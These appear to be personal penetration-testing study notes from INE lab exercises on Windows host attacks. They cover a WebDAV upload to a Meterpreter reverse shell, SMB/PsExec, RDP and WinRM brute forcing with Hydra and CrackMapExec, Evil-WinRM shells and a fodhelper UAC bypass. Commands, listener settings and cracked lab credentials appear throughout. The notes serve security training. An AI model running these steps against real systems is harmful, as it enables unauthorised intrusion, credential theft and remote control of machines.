System/Host Based Attacks

Host & Network Penetration Testing: System/Host Based Attacks

---

• Introduction
• Overview of Windows Vulnerability
• Exploiting Windows Vulnerabilities
• Windows Privilege Escalation
• Windows File System Vulnerabilities
• Windows Credential Dumping
• Windows Lateral Movement

---

• Overview of Linux Vulnerabilities
• Exploiting Linux Vulnerabilities
• Linux Privilege Escalation
• Linux File System Vulnerabilities
• Linux Credential Dumping

---

Introduction to Attacks

---

---

---

WINDOWS VULNERABILITY

---

---

---

MAIN CONCEPT : Exploiting Windows Vulnerabilities

---

---

Let's go :::::::

Exploiting Microsoft IIS WebDAV

---

WebDAV runs on top of IIS or Apache

---

---

Exploiting WebDAV With Metasploit

---

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. It provides a framework for users to create, change, and move documents on a server, typically a web server or a content management system.

Metasploit is a widely used penetration testing framework that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

In this lab, we will learn how to exploit the WebDav service using the Metasploit framework.

---

Use nmap to scan the port for webdav if present > then run a complete analysis.

After that what I am going to do is > use the meterpreter session which is an advance reverse shell

As we already have the user name and Pass provided > ID: bob | PAss: password_123321

---

This is the payload which we generated via msfvenom

---

---

Now, we have uploaded the payload which we generated into the webdav.

---

confirmation.

---

We now need to set up a listener or handler that will receive the reverse connection

---

Now we need to cretae a Listner: for that we are using MEtasploit >

msf6 > use multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

Now: set the LHOST via > set LHOST

        set LPORT <1234>

---

Go to the web browser and click the payload in the browser boom your payload is executed and we are in.

The whole concept was for manual Okay !

---

Let's move with the OG automated process: via Metasploit

---

Great work on executing this classic IIS WebDAV file upload exploit via Metasploit. Let's walk through the full concept step-by-step, so you understand what you achieved technically and why it worked.

---

Overview: IIS WebDAV Upload ASP Exploit

This exploit takes advantage of a misconfigured WebDAV extension in Microsoft IIS (Internet Information Services) servers that allows unauthenticated or weakly authenticated file uploads. These files can be renamed with an .asp extension (active server page), which the server then executes.

Once your malicious ASP payload is uploaded and executed, it gives you remote code execution—specifically, a Meterpreter shell on the Windows server.

---

Step-by-Step Breakdown

🔹 1. Module Search & Selection

msf6 > search iis upload

You found:

• exploit/windows/iis/iis_webdav_upload_asp

This targets IIS servers with WebDAV enabled and misconfigured to allow unauthorized uploads or poorly secured file moves.

🔹 2. Module Configuration

msf6 > use exploit/windows/iis/iis_webdav_upload_asp

Key Options Set:

Option	Value	Explanation
HttpUsername	bob	WebDAV username
HttpPassword	password_123321	WebDAV password
RHOSTS	demo.ine.local	Target web server
PATH	/webdav/metasploit.asp	Final path after renaming
METHOD	move	First upload as .txt, then rename to .asp
LHOST	10.10.39.4	Your attack machine IP
LPORT	4444	Your listener port for reverse shell

Metasploit automatically chose this payload:

windows/meterpreter/reverse_tcp

This payload opens a reverse TCP connection from the victim back to your attacking machine.

---

🔹 3. Exploit Execution

run

What Metasploit does behind the scenes:

1. Uploads metasploit.txt (payload content) to the WebDAV share.
2. Uses the move method to rename .txt to .asp.
3. Triggers the .asp script by visiting /webdav/metasploit.asp.
4. The server executes the ASP code, causing it to connect back to your listener on 10.10.39.4:4444.
5. You get a Meterpreter shell.

---

🔹 4. Post-Exploitation Access

meterpreter > sysinfo

You're on:

• Windows Server 2019
• Running as NT AUTHORITY\SYSTEM – the highest privilege on Windows.

meterpreter > getuid

Confirms you're SYSTEM.

---

Why This Vulnerability Exists

• WebDAV is a file-sharing extension to HTTP.
• Poorly configured IIS + WebDAV lets you:
  • Upload files (e.g., .txt)
  • Move or rename them (e.g., to .asp)
• If ASP execution is enabled, the web server will execute your script.

Exploitable Conditions:

• WebDAV is enabled
• Weak authentication or default credentials
• ASP scripting is enabled
• You can rename uploaded files to .asp

---

Mitigation & Hardening

1. Disable WebDAV if not needed.
2. Restrict executable file uploads (e.g., .asp, .php, .jsp).
3. Use strong authentication on WebDAV.
4. Apply strict file extension filters.
5. Use modern web platforms that separate static content from dynamic code.

---

Summary

Stage	Action
1	Selected Metasploit module for IIS WebDAV upload
2	Configured credentials, RHOST, and payload
3	Uploaded .txt, renamed it to .asp
4	Triggered execution, gained a Meterpreter shell
5	Verified SYSTEM access and OS details

You just fully compromised a vulnerable web server through remote code execution over HTTP using an ASP file drop and rename tactic. This is a textbook example of abusing file upload logic.

---

SMB with PsExec

---

📡 What is SMB?

SMB (Server Message Block) is a network file sharing protocol that allows applications or users to read and write to files and request services on remote servers. It's primarily used by Windows systems to enable shared access to files, printers, serial ports, and more over a network.

---

SMB Authentication

The SMB protocol uses two levels of authentication:

1. User Authentication

• Requires a username and password.
• This verifies that the user has valid credentials on the SMB server to access its services or shares.

2. Share Authentication

• Requires a password to access a specific shared folder or resource.
• Even after successful user authentication, share-level protection can limit access to certain shared directories.

Note: Both levels use a challenge-response authentication mechanism (typically NTLM). This means:

• The server sends a random challenge string.
• The client encrypts this challenge using a hash derived from the user's password.
• The server then verifies this encrypted response using its own stored password hash.

---

SMB Authentication Flow (Diagram Explanation)

1. Client sends authentication request to the server.
2. Server sends a challenge (random string).
3. Client encrypts challenge using its password hash.
4. Client sends encrypted string back to server.
5. Server compares the encrypted string with its expected value.
6. If matched, access is granted.

This ensures that the actual password is never sent over the network—only a hash-based response is.

---

What is PsExec?

PsExec is a powerful remote administration tool developed by Microsoft (Sysinternals suite). It allows:

• Execution of commands on remote Windows machines.
• Use of any user credentials to authenticate.
• Runs commands as if you were using a remote CMD shell (unlike RDP which provides GUI access).

PsExec Authentication:

• Uses SMB for transport and authentication.
• Credentials are passed through the SMB protocol for verification.

---

SMB Exploitation Using PsExec

To exploit a Windows system via SMB + PsExec:

Requirements:

• Valid user credentials (or password hash).
• Common accounts targeted: Administrator, Admin, user, etc.
• These credentials are often obtained via:
  • Brute-force attacks on SMB login
  • Credential dumping
  • Captured hashes

Steps:

1. Brute-force SMB login using tools like hydra, medusa, or Metasploit.
2. Once valid credentials are found:
   • Use PsExec module in Metasploit (exploit/windows/smb/psexec)
   • Authenticate with the target using found creds.
3. Execute arbitrary commands remotely or gain a reverse shell.

Think of PsExec as a remote command-line executor that works by leveraging SMB and Windows services.

---

Summary Table

Component	Description
SMB	Network protocol for sharing files, printers, etc.
User Authentication	Login to SMB with username/password
Share Authentication	Password required for accessing specific shares
PsExec	Tool to execute commands on remote Windows via SMB
SMB Exploitation	Gaining unauthorized remote access using valid credentials + PsExec

---

PsExec Authentication via SMB

PsExec, both the original Sysinternals version and the Impacket implementation (psexec.py), relies on SMB (Server Message Block) protocol for remote access and command execution.

🔹 How it works under the hood:

1. Connection Initialization:
   • PsExec connects to the target machine's SMB service (typically over port 445).
2. Authentication:
   • It uses NTLM authentication to log in as the specified user (Administrator@target).
   • This is a challenge-response authentication handled over SMB.
3. Admin Shares & Service Creation:
   • After successful login:
     • PsExec accesses admin shares (like \\C$) to drop its service executable.
     • Then it remotely creates a service via SMB to run that executable.
     • This allows it to spawn a shell (cmd.exe or PowerShell) and connect you to it.
4. SMB Session for I/O:
   • Input/output is tunneled over that same SMB session, essentially creating a remote shell over SMB.

---

Key Points to Remember:

• PsExec requires SMB access to the target.
• The user account must have administrative privileges.
• If SMB is blocked by firewall or SMBv1 is disabled (common in modern Windows environments), PsExec may fail to connect.
• SMB signing or encryption policies may also interfere, depending on the network/domain policy.

---

Common PsExec/SMB Troubleshooting Tips:

Issue	Fix
Port 445 blocked	Ensure firewall allows it
Access denied	Use correct admin credentials
NTLM not allowed	Use Kerberos or configure fallback
SMBv1 disabled	Use Impacket's SMBv2+ support (it does support it)
Service fails to start	Check AV/EDR, it might block PsExec service

---

EXPLOITING RDP

---

The main vulnerability of RDP was BlueKeep CVE-2019-0708

---

---

Great — you're doing advanced RDP enumeration and brute-forcing using Metasploit, Hydra, and xfreerdp. Let's break down everything you did, what it means, and how it all ties together step by step. I'll walk you through:

---

1. Metasploit RDP Scanner Module

You used:

use auxiliary/scanner/rdp/rdp_scanner

Purpose:

Scans targets for open RDP services and checks if:

• RDP is enabled
• NLA (Network Level Authentication) is required
• OS info, domain name, and computer name

---

You ran it on port 3333:

set RPORT 3333
run

Output:

Detected RDP on 10.4.17.224:3333
(name:WIN-OMCNBKR66MN)
(domain:WIN-OMCNBKR66MN)
(os_version:6.3.9600)
(Requires NLA: Yes)

🔹 Interpretation:

• RDP is enabled on port 3333 (non-default, default is 3389)
• The host's NetBIOS name is WIN-OMCNBKR66MN

• NLA is enabled – this is important because:

  NLA means that the RDP server requires credentials before establishing the session, making brute-force harder.

---

2. RDP Brute-force with Hydra

hydra -L common_users.txt -P unix_passwords.txt rdp://demo.ine.local -s 3333

What's Happening:

• Hydra tries all user/password combinations on the RDP service.
• It uses RDP as the target protocol on port 3333.
• The L and P flags specify the username and password wordlists.

Output:

[3333][rdp] host: demo.ine.local   login: sysadmin   password: samantha
[ERROR] freerdp: The connection failed to establish.

🔹 Interpretation:

• A valid username/password was found: sysadmin:samantha
• But the actual RDP connection failed, likely due to:
  • NLA being enforced (Hydra's RDP module doesn't fully support NLA)
  • RDP server rate-limiting or blocking
  • Authentication success on protocol level, but not session-level (RDP quirks)

---

3. Manual Login Attempt with xfreerdp

xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333

What Happened:

1. You connected to the RDP server manually
2. The certificate was self-signed, and the CN didn't match the hostname (demo.ine.local ≠ WIN-OMCNBKR66MN)
3. You trusted the certificate manually by pressing Y
4. The connection started initializing (framebuffer, audio, channels)
5. Then you got:

Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]

Connection failed

🔹 Interpretation:

• The RDP client successfully negotiated the connection with the server.
• The login failed at the authentication level.
• The credentials administrator:qwertyuiop were incorrect.

---

Key Concepts Recap

Tool	Purpose	Notes
rdp_scanner	Scans hosts for open RDP, detects NLA	Good for fingerprinting
Hydra	Brute-force RDP logins	Struggles with NLA
xfreerdp	Manual RDP client for Linux	Supports NLA & TLS
NLA (Network Level Authentication)	Requires valid credentials before RDP shell is allowed	Makes brute-force harder
RDP Port 3333	Non-standard	May be intentional obfuscation

---

What Can You Do Next?

Try the sysadmin:samantha combo with xfreerdp:

xfreerdp /u:sysadmin /p:samantha /v:demo.ine.local:3333

This should work if NLA is passed and the creds are valid.

---

Capture & Replay with rdesktop (older RDP versions, rarely works now)

Sometimes helps if NLA is not enforced.

rdesktop demo.ine.local:3333 -u sysadmin -p samantha

---

---

---

EXPLOITING WinRM

---

---

You're diving deep into CrackMapExec (CME) — one of the most powerful post-exploitation and credential spraying tools in a penetration tester's arsenal. You're already using it effectively to brute-force WinRM logins, enumerate systems, and execute remote commands.

Let's break it all down so you fully understand what CME is, how it works, and what more you can do with it.

---

What is CrackMapExec?

CrackMapExec is a post-exploitation Swiss army knife for pentesting Windows environments. It was developed by @byt3bl33d3r and is used for:

• Credential spraying and bruteforcing
• Remote command execution
• Active Directory enumeration
• SMB/WinRM/RDP/MSSQL/FTP/LDAP exploitation
• Kerberos and pass-the-hash attacks
• Lateral movement within a network

Codename for your version: Indestructible G0thm0g

---

Protocol Support in CME

Protocol	Description
smb	File shares, credential checking, enumeration
winrm	Remote command execution over WinRM
rdp	RDP login checks
ldap	Directory enumeration
ftp	Brute-force and banner grabbing
ssh	Brute-force, exec
mssql	SQL command execution, xp_cmdshell abuse

---

Example: What You Did with winrm

🔹 Step 1: Port Discovery

nmap -sV -p 5985 demo.ine.local

• Confirms that WinRM is running on port 5985 (unencrypted HTTP).
• Detected Microsoft HTTPAPI httpd 2.0.

---

🔹 Step 2: Brute-force Admin Credentials

crackmapexec winrm demo.ine.local -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

• CME attempts to log in to the target via WinRM using each password in the list.
• Output example:

WINRM demo.ine.local 5985 SERVER [+] server\administrator:tinkerbell (Pwn3d!)

You found valid credentials!

---

🔹 Step 3: Remote Command Execution

crackmapexec winrm demo.ine.local -u administrator -p tinkerbell -x "whoami"

• x lets you execute arbitrary commands remotely on the target.
• Response:

WINRM demo.ine.local [+] Executed command
WINRM demo.ine.local server\administrator

Shows you're executing as Administrator, which is high privilege.

---

How Does CME Work Internally?

1. WinRM Protocol

• Uses Windows Remote Management, which is a SOAP-based protocol over HTTP (port 5985) or HTTPS (port 5986).
• CME uses Python's pywinrm module behind the scenes to send authenticated remote PowerShell/command calls.

2. Authentication Methods

• NTLM (username/password or NT hash)
• Kerberos (via ticket or plaintext)
• Pass-the-Hash and Pass-the-Ticket supported

3. Exec Mode

• Once authenticated, you can:
  • Run cmd.exe or PowerShell commands
  • Chain commands
  • Write/read files
  • Execute payloads or drop beacons

---

Bonus: What Else You Can Do with winrm in CME

Task	Command
Read flag	-x "type C:\\flag.txt"
List users	-x "net user"
List admins	-x "net localgroup administrators"
Pull user SID	-x "whoami /user"
Enumerate patches	-x "wmic qfe"
Find AV software	-x "wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName"

---

Why Use CME Over Other Tools?

• Highly scriptable
• Batch-scan entire networks
• Chain together recon + execution
• Supports pass-the-hash, pass-the-ticket, Kerberos, plaintext, and relayed creds
• Quickly tells you if a credential is valid across many hosts

---

Tip: Save Workspaces

You can save scans and interactions into a workspace, like:

crackmapexec --workspace corpnet smb 10.0.0.0/24 -u admin -p password123

Then later:

crackmapexec --workspace corpnet --sessions

---

Want to Try Advanced Use Cases?

• Dump credentials with mimikatz over SMB (-mimikatz)
• Run scripts over PowerShell remoting
• Lateral movement across domain
• Kerberoasting, DCSync, and NTDS.dit dumping (via cme smb)

---

Summary of What You've Achieved So Far:

Action	Outcome
Detected WinRM	Port 5985 open
Brute-forced credentials	Found administrator:tinkerbell
Verified execution	Used whoami, got server\administrator
Privilege	You're NT AUTHORITY\SYSTEM-equivalent if WinRM is unrestricted

---

WTF is Evil-WinRM?

Evil-WinRM is a post-exploitation tool for hacking Windows machines remotely over WinRM (Windows Remote Management).

It gives you a direct PowerShell shell on the victim machine.

Think of it as:

PowerShell remoting on steroids + hacker magic

---

root㉿INE)-[~] └─# evil-winrm -u administrator -p 'tinkerbell' -i demo.ine.local

This will grant you the shell access

---

WINDOWS PRIVILEGE ESCALATION

---

---

WINDOWS KERNAL EXPLOITS

---

---

https://github.com/SecWiki/windows-kernel-exploits

UAC (User Account Control) is a security feature in modern Windows operating systems designed to prevent unauthorized changes to the system. Here's a breakdown of what it is and how it works:

---

What is UAC?

User Account Control (UAC) is a Windows security mechanism that prompts users for permission or admin credentials before allowing actions that could potentially affect the system's operation or that change settings for other users.

---

How UAC Works

When a user (even an admin) runs a program, it runs with standard privileges by default. If that program tries to perform a high-integrity task (like modifying system files, installing software, or editing the registry), Windows checks whether:

1. The application is requesting elevated permissions.
2. The user has administrative rights.

Then UAC:

• Shows a prompt (called a consent prompt or credential prompt)
• Asks the user to either allow or deny the action
• Logs the activity in security logs

UAC in Privilege Escalation

Attackers often try to bypass UAC to escalate from a low-privilege context to high-integrity/admin. Common techniques include:

• Using auto-elevating binaries (e.g., fodhelper.exe, eventvwr.exe)
• DLL hijacking in trusted directories
• UACMe – a tool that automates UAC bypasses via known vectors

Example:

bash
CopyEdit
C:\Windows\System32\fodhelper.exe

This binary auto-elevates if misused with a crafted registry key (e.g., setting HKCU\Software\Classes\ms-settings\shell\open\command) that launches a malicious payload with admin rights.